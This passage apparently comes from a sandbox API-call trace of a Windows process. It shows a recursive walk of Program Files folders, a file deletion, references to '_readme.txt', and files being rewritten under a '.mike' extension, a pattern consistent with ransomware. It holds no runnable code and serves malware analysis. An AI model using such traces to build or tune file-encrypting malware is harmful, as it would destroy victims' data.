[0127.968] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar")) returned 1 [0127.969] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\_readme.txt", lpFilePart=0x0) returned 0x39 [0127.971] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.971] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.971] CoTaskMemFree (pv=0x508980) [0127.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.971] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi", lpFilePart=0x0) returned 0x27 [0127.976] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.976] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.976] CoTaskMemFree (pv=0x508980) [0127.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.976] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa", lpFilePart=0x0) returned 0x2e [0127.983] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0127.983] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0127.983] CoTaskMemFree (pv=0x508980) [0127.983] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0127.983] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America", lpFilePart=0x0) returned 0x2f [0128.004] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.004] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.004] CoTaskMemFree (pv=0x508980) [0128.004] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.004] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina", lpFilePart=0x0) returned 0x39 [0128.009] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.009] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.009] CoTaskMemFree (pv=0x508980) [0128.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.010] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana", lpFilePart=0x0) returned 0x37 [0128.013] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.013] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.013] CoTaskMemFree (pv=0x508980) [0128.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.014] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky", lpFilePart=0x0) returned 0x38 [0128.014] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.014] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.014] CoTaskMemFree (pv=0x508980) [0128.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.015] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota", lpFilePart=0x0) returned 0x3c [0128.015] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.015] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.015] CoTaskMemFree (pv=0x508980) [0128.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.016] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica", lpFilePart=0x0) returned 0x32 [0128.020] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.020] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.020] CoTaskMemFree (pv=0x508980) [0128.020] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.020] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia", lpFilePart=0x0) returned 0x2c [0128.028] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.028] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.028] CoTaskMemFree (pv=0x508980) [0128.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.028] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic", lpFilePart=0x0) returned 0x30 [0128.034] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.034] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.034] CoTaskMemFree (pv=0x508980) [0128.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.034] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia", lpFilePart=0x0) returned 0x31 [0128.038] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.038] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.038] CoTaskMemFree (pv=0x508980) [0128.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.039] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc", lpFilePart=0x0) returned 0x2b [0128.043] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.043] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.044] CoTaskMemFree (pv=0x508980) [0128.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.044] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe", lpFilePart=0x0) returned 0x2e [0128.049] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.049] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.049] CoTaskMemFree (pv=0x508980) [0128.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.050] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian", lpFilePart=0x0) returned 0x2e [0128.054] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.054] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.054] CoTaskMemFree (pv=0x508980) [0128.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.054] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific", lpFilePart=0x0) returned 0x2f [0128.059] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.059] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.060] CoTaskMemFree (pv=0x508980) [0128.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.060] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV", lpFilePart=0x0) returned 0x2f [0128.064] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.064] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.064] CoTaskMemFree (pv=0x508980) [0128.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.065] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services", lpFilePart=0x0) returned 0x32 [0128.065] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.065] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.065] CoTaskMemFree (pv=0x508980) [0128.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB", lpFilePart=0x0) returned 0x3b [0128.066] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.066] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.066] CoTaskMemFree (pv=0x508980) [0128.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.066] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10", lpFilePart=0x0) returned 0x3e [0128.071] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.071] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.071] CoTaskMemFree (pv=0x508980) [0128.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.071] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", lpFilePart=0x0) returned 0x49 [0128.076] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.076] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.076] CoTaskMemFree (pv=0x508980) [0128.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources", lpFilePart=0x0) returned 0x48 [0128.077] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.077] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.077] CoTaskMemFree (pv=0x508980) [0128.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.077] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033", lpFilePart=0x0) returned 0x4d [0128.078] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.078] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.078] CoTaskMemFree (pv=0x508980) [0128.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.079] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Office", lpFilePart=0x0) returned 0x27 [0128.079] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.079] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.079] CoTaskMemFree (pv=0x508980) [0128.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.079] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Office\\Office14", lpFilePart=0x0) returned 0x30 [0128.081] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.081] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.081] CoTaskMemFree (pv=0x508980) [0128.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.082] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033", lpFilePart=0x0) returned 0x35 [0128.086] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.086] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.086] CoTaskMemFree (pv=0x508980) [0128.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.086] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8", lpFilePart=0x0) returned 0x30 [0128.087] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.087] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.087] CoTaskMemFree (pv=0x508980) [0128.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.087] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7", lpFilePart=0x0) returned 0x38 [0128.088] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.088] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.088] CoTaskMemFree (pv=0x508980) [0128.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.088] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE", lpFilePart=0x0) returned 0x3c [0128.088] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.089] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.089] CoTaskMemFree (pv=0x508980) [0128.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.089] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies", lpFilePart=0x0) returned 0x4e [0128.089] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.089] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.090] CoTaskMemFree (pv=0x508980) [0128.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.090] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies", lpFilePart=0x0) returned 0x4d [0128.096] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.096] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.096] CoTaskMemFree (pv=0x508980) [0128.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.096] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA", nBufferLength=0x105, lpBuffer=0x2aecdc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA", lpFilePart=0x0) returned 0x41 [0128.097] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.097] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.097] CoTaskMemFree (pv=0x508980) [0128.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.098] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates", lpFilePart=0x0) returned 0x4f [0128.098] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.098] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.098] CoTaskMemFree (pv=0x508980) [0128.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.098] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp", nBufferLength=0x105, lpBuffer=0x2aec4c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp", lpFilePart=0x0) returned 0x56 [0128.099] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0128.099] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0128.099] CoTaskMemFree (pv=0x508980) [0128.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0128.099] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033", nBufferLength=0x105, lpBuffer=0x2aec04, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033", lpFilePart=0x0) returned 0x5b [0128.103] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0128.103] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", lpFilePart=0x0) returned 0x6d [0128.104] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip", nBufferLength=0x105, lpBuffer=0x2aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip", lpFilePart=0x0) returned 0x68 [0128.111] WriteFile (in: hFile=0x288, lpBuffer=0x219a344*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2aefcc, lpOverlapped=0x0 | out: lpBuffer=0x219a344*, lpNumberOfBytesWritten=0x2aefcc*=0x20c, lpOverlapped=0x0) returned 1 [0128.111] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\AboutBox.zip.mike", nBufferLength=0x105, lpBuffer=0x2aebb8, lpFilePart=0x0 | out: 